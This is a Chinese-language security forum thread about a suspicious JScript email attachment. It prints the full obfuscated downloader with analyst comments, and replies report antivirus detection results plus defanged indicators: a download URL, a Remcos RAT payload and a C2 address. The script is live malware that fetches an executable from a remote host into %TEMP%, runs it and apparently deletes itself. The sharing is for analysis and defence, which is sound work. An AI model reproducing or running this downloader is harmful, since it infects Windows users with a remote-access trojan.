
[可疑文件] 郵箱伺服器收到的可疑js檔案

megakotaro
发表于 2022-10-26 10:31:26 | 显示全部楼层 |阅读模式
本帖最后由 megakotaro 于 2022-10-26 10:59 编辑

壓縮檔密碼：infected（樣本已加密打包，解壓後請只在隔離的分析環境中開啟）

KES（Kaspersky Endpoint Security）當下無法偵測，但 OpenTIP 已經有報毒：
https://opentip.kaspersky.com/CA21396DF7EBA831EA17C98D2FDD4321A8B529BB1A103F9F5F0249F3F69D7494/results?tab=upload



JS 程式碼如下（經混淆的 Windows Script Host 腳本，請勿在非隔離環境中雙擊或執行）：

// ---------------------------------------------------------------------------
// MALWARE SAMPLE — analysis copy, do not run. JScript downloader delivered as an
// e-mail attachment ("PAYMENT COPY.js" in the scan logs below). It targets
// Windows Script Host (WScript / ActiveXObject); it is not Node or browser code.
//
// Obfuscation layout (obfuscator.io-style):
//   * _0x56df()      returns the string table _0x5edb84; the IIFE directly below
//                    rotates that table (push(shift())) until a parseInt() checksum
//                    over selected entries equals 0x230e6, so the numeric indices
//                    used later only resolve after that rotation.
//   * _0x5904(i)     plain lookup: table[i - 0x8b]   (alias _0xcff520).
//   * _0x3985(i, k)  lookup, then a base64 variant with a lowercase-first alphabet
//                    (_0x48fb6a), then RC4 with key k (_0x3985da: 256-byte KSA +
//                    XOR keystream); decoded strings are cached (alias _0x4f2af2).
//
// Behaviour readable from the clear-text parts (plain table entries MSXML2.XMLHTTP,
// ADODB.Stream, Shell.Application, ResponseBody, CreateObject; literal 'Send',
// 'Position', 'SaveToFile', 'Close', 'ShellExecute'):
//   1. pOut = <FSO.GetSpecialFolder(2)>\NMXCJKHKDFDF.exe — index 2 is the
//      TemporaryFolder constant in the FileSystemObject API, i.e. %TEMP%.
//   2. An object is created via a plain-table string pair (presumably
//      WScript.CreateObject('MSXML2.XMLHTTP')); a request is opened with an
//      RC4-encrypted method/URL pair and async=false (third argument ![]), then Send().
//      The URL cannot be recovered by reading; a reply in this thread reports
//      uiu-auzq5[.]tk/nn/NMXCJKHKDFDF.exe — confirm in a sandbox.
//   3. ResponseBody is written through ADODB.Stream (Type = 1, adTypeBinary) and
//      SaveToFile(pOut, 2) — 2 (adSaveCreateOverWrite) replaces an existing file.
//   4. Shell.Application.ShellExecute(pOut, '', '', <verb>, '1') launches the payload.
//   5. One more ActiveXObject is created and an encrypted method is called on a
//      WScript property — presumably FSO.DeleteFile(WScript.ScriptFullName)
//      (self-delete); the strings are RC4-encrypted, so verify dynamically.
//
// Defensive notes: the XMLHTTP → ADODB.Stream.SaveToFile → ShellExecute chain out
// of wscript.exe is a high-fidelity detection (hunt for wscript.exe writing to and
// then spawning an .exe from %TEMP%); block .js/.jse attachments at the mail
// gateway and consider re-associating .js with Notepad so a double-click never
// reaches wscript.exe.
// ---------------------------------------------------------------------------
var _0x4f2af2=_0x3985,_0xcff520=_0x5904;(function(_0x173531,_0x11123b){var _0x57c5d6=_0x3985,_0x36b966=_0x5904,_0x2bd6c=_0x173531();while(!![]){try{var _0x5200a6=parseInt(_0x36b966(0xa7))/0x1*(parseInt(_0x57c5d6(0xa9,'wIWr'))/0x2)+parseInt(_0x36b966(0x95))/0x3+-parseInt(_0x57c5d6(0xa6,'qDqc'))/0x4+-parseInt(_0x36b966(0x94))/0x5+parseInt(_0x36b966(0x8b))/0x6*(-parseInt(_0x57c5d6(0x98,'GHD&'))/0x7)+-parseInt(_0x57c5d6(0xa4,')!Br'))/0x8+parseInt(_0x57c5d6(0xa0,'nL[q'))/0x9*(parseInt(_0x36b966(0x9a))/0xa);if(_0x5200a6===_0x11123b)break;else _0x2bd6c['push'](_0x2bd6c['shift']());}catch(_0x270f0d){_0x2bd6c['push'](_0x2bd6c['shift']());}}}(_0x56df,0x230e6));/* drop path: %TEMP%\NMXCJKHKDFDF.exe; then the HTTP object (plain-table strings, presumably CreateObject('MSXML2.XMLHTTP')) */var pOut=new ActiveXObject('Scripting.FileSystemObject')['GetSpecialFolder'](0x2)+'\x5cNMXCJKHKDFDF.exe',Object=WScript[_0xcff520(0xa1)](_0xcff520(0x8f));function _0x5904(_0x9c84c,_0x17dd92){var _0x56df3f=_0x56df();return _0x5904=function(_0x59043b,_0x196c0a){_0x59043b=_0x59043b-0x8b;var _0x51a412=_0x56df3f[_0x59043b];return _0x51a412;},_0x5904(_0x9c84c,_0x17dd92);}/* synchronous request: <Open>(<method>, <url>, false) then Send(); method and URL are RC4-encrypted */Object[_0x4f2af2(0xaa,'TuLi')](_0x4f2af2(0x9c,'S[46'),_0x4f2af2(0x91,'z3a$'),![]),Object['Send']();function _0x3985(_0x9c84c,_0x17dd92){var _0x56df3f=_0x56df();return _0x3985=function(_0x59043b,_0x196c0a){_0x59043b=_0x59043b-0x8b;var _0x51a412=_0x56df3f[_0x59043b];if(_0x3985['ScXJZs']===undefined){var _0x48fb6a=function(_0x2fd867){var _0x471fd1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x5578d5='',_0x515abf='';for(var _0x3a4496=0x0,_0x380316,_0x4a0cc6,_0x5cb575=0x0;_0x4a0cc6=_0x2fd867['charAt'](_0x5cb575++);~_0x4a0cc6&&(_0x380316=_0x3a4496%0x4?_0x380316*0x40+_0x4a0cc6:_0x4a0cc6,_0x3a4496++%0x4)?_0x5578d5+=String['fromCharCode'](0xff&_0x380316>>(-0x2*_0x3a4496&0x6)):0x0){_0x4a0cc6=_0x471fd1['indexOf'](_0x4a0cc6);}for(var _0x39283c=0x0,_0x1bb641=_0x5578d5['length'];_0x39283c<_0x1bb641;_0x39283c++){_0x515abf+='%'+('00'+_0x5578d5['charCodeAt'](_0x39283c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x515abf);};var 
// _0x3985da: RC4 — key-scheduling over a 256-entry box, then XOR of each input byte
// with the keystream; the input is first run through the base64 decoder above.
_0x3985da=function(_0x283da5,_0x2b0fa8){var _0x199236=[],_0x4ba68c=0x0,_0x4f0a58,_0x1a7710='';_0x283da5=_0x48fb6a(_0x283da5);var _0x1252df;for(_0x1252df=0x0;_0x1252df<0x100;_0x1252df++){_0x199236[_0x1252df]=_0x1252df;}for(_0x1252df=0x0;_0x1252df<0x100;_0x1252df++){_0x4ba68c=(_0x4ba68c+_0x199236[_0x1252df]+_0x2b0fa8['charCodeAt'](_0x1252df%_0x2b0fa8['length']))%0x100,_0x4f0a58=_0x199236[_0x1252df],_0x199236[_0x1252df]=_0x199236[_0x4ba68c],_0x199236[_0x4ba68c]=_0x4f0a58;}_0x1252df=0x0,_0x4ba68c=0x0;for(var _0x2dfa7a=0x0;_0x2dfa7a<_0x283da5['length'];_0x2dfa7a++){_0x1252df=(_0x1252df+0x1)%0x100,_0x4ba68c=(_0x4ba68c+_0x199236[_0x1252df])%0x100,_0x4f0a58=_0x199236[_0x1252df],_0x199236[_0x1252df]=_0x199236[_0x4ba68c],_0x199236[_0x4ba68c]=_0x4f0a58,_0x1a7710+=String['fromCharCode'](_0x283da5['charCodeAt'](_0x2dfa7a)^_0x199236[(_0x199236[_0x1252df]+_0x199236[_0x4ba68c])%0x100]);}return _0x1a7710;};_0x3985['rIGhVh']=_0x3985da,_0x9c84c=arguments,_0x3985['ScXJZs']=!![];}var _0x35bd58=_0x56df3f[0x0],_0x4aa8cc=_0x59043b+_0x35bd58,_0x5e6e2e=_0x9c84c[_0x4aa8cc];return!_0x5e6e2e?(_0x3985['ylfOpK']===undefined&&(_0x3985['ylfOpK']=!![]),_0x51a412=_0x3985['rIGhVh'](_0x51a412,_0x196c0a),_0x9c84c[_0x4aa8cc]=_0x51a412):_0x51a412=_0x5e6e2e,_0x51a412;},_0x3985(_0x9c84c,_0x17dd92);}function _0x56df(){var 
// _0x5edb84: the string table. The clear-text entries name the COM objects and
// members used; the mixed-case entries are base64(RC4) blobs consumed by _0x3985,
// and the digit-prefixed ones feed the parseInt() checksum in the rotation IIFE.
_0x5edb84=['W6jPqSoOWP7dKCoEoCkGpuSa','5317KmOPsx','W6f/EhCKoWqyAxGaW5GNW64','AmkKl8kSWR/dOb3cHau','j0DGxq','6ZNQDDn','WReGWQrlWQC','o8oIwmkuo8odsaZdHr4','ResponseBody','MSXML2.XMLHTTP','CmkfWOpcRmoJzCkHWQz0WRlcOmof','wSoTBvKHW6rJWRJdV8krESk+W4NcOcNdSCoPW4mJx8k8W7rwr8o9dCkcWPS7WR3cSIlcI8k0W7RdSCobgSo8W7m','Open','jtBcGs3dI8ouvfldVKrAWRW','224295AsaaII','171096WhivHY','Shell.Application','s8kpBvtdTmk7W5lcK0aMbgqW','WRfKgmoxmLuWu8kUWRWglq','WP9dW4/dOCkJovHuW77dLW','3860mnRLVl','ADODB.Stream','DmocW5G','102pIDUIi','W5jrWOBcKqLOtCklhSo+','Type','qCkKW7VcVrJdSSoQWQHEWRu','CreateObject','open','yCo6A0aIWQOLW7NdRCowsCo6W4tcSaddUCkVWPKYwCoCW7HsdCoqna','W4bxlCk/Cqygg8oEW77cQmo5wW','xmkAW7zIuGqU'];_0x56df=function(){return _0x5edb84;};return _0x56df();}/* write the response body to disk: ADODB.Stream (Type=1, binary) → SaveToFile(pOut, 2 = overwrite) */var Stream=WScript[_0xcff520(0xa1)](_0xcff520(0x9b));Stream[_0xcff520(0x92)](),Stream[_0xcff520(0x9f)]=0x1,Stream[_0x4f2af2(0x8c,'kpbZ')](Object[_0xcff520(0x8e)]),Stream['Position']=0x0,Stream['SaveToFile'](pOut,0x2),Stream['Close'](),/* launch the dropped executable via Shell.Application.ShellExecute */new ActiveXObject(_0xcff520(0x96))['ShellExecute'](pOut,'','',_0xcff520(0xa2),'1'),/* presumably self-delete: FSO.DeleteFile(WScript.ScriptFullName) — object/method/property names are RC4-encrypted, confirm dynamically */new ActiveXObject(_0x4f2af2(0xa3,'z3a$'))[_0x4f2af2(0x9e,'cxQS')](WScript[_0x4f2af2(0xa8,'YL!G')]);

Shake2333
发表于 2022-10-26 10:41:23 | 显示全部楼层
本帖最后由 Shake2333 于 2022-10-26 10:42 编辑

fs（F-Secure）双击执行时未拦截脚本本身，但查杀了其衍生物（脚本下载并写入 %TEMP% 的 NMXCJKHKDFDF.exe）

Eset小粉絲
发表于 2022-10-26 11:01:57 | 显示全部楼层
ESET 判定：JS/Downloader，最終載荷為 Remcos（RAT）。
IOC（已去毒化，請勿直接點擊）：下載 URL https[://uiu-auzq5.tk/nn/NMXCJKHKDFDF.exe（檔名與腳本寫入 %TEMP% 的 NMXCJKHKDFDF.exe 一致）；C2 為 51.75.209.245:2404。
喀反
发表于 2022-10-26 11:07:18 | 显示全部楼层
卡巴双击杀

lip123
发表于 2022-10-26 11:27:57 | 显示全部楼层
火绒扫描杀

病毒库时间:2022-10-25 17:41
开始时间:2022-10-26 11:26
总计用时:00:00:01
扫描对象:1
扫描文件:1
发现风险:1
已处理风险:1
病毒详情:
风险路径:C:\Users\Administrator.UUMLJDUW4DP6EEO\Desktop\PAYMENT COPY\PAYMENT COPY.js, 病毒名:SVM:TrojanDownloader/JS.MalBehav.gen!D, 病毒ID:aa6434f5bf28f3ff, 处理结果:已处理,删除文件
多变的风向
发表于 2022-10-26 12:12:27 | 显示全部楼层
小A双击

kuroandsan
发表于 2022-10-26 12:23:58 | 显示全部楼层
Dr.Web 双击

Do1phln
发表于 2022-10-26 12:30:38 | 显示全部楼层
360杀毒扫描日志

病毒库日期:2022-10-25
扫描时间:2022-10-26 12:30:18
扫描用时:00:00:01
扫描类型:右键扫描
扫描文件总数:1
项目总数:0
清除项目数:0

扫描选项
----------------------
扫描所有文件:否
扫描压缩包:否
发现病毒处理方式:由用户选择处理
扫描磁盘引导区:是
扫描 Rootkit:否
使用云查杀引擎:是
使用QVM人工智能引擎:是
扫描建议修复项:是
常规引擎设置:

扫描内容
----------------------
\Downloads\PAYMENT COPY


白名单设置
----------------------


扫描结果
======================
未发现威胁文件
ytysh
发表于 2022-10-26 13:12:46 | 显示全部楼层
Ahnlab V3 Lite Miss
PianoA
发表于 2022-10-26 13:58:38 | 显示全部楼层
金山安全终端miss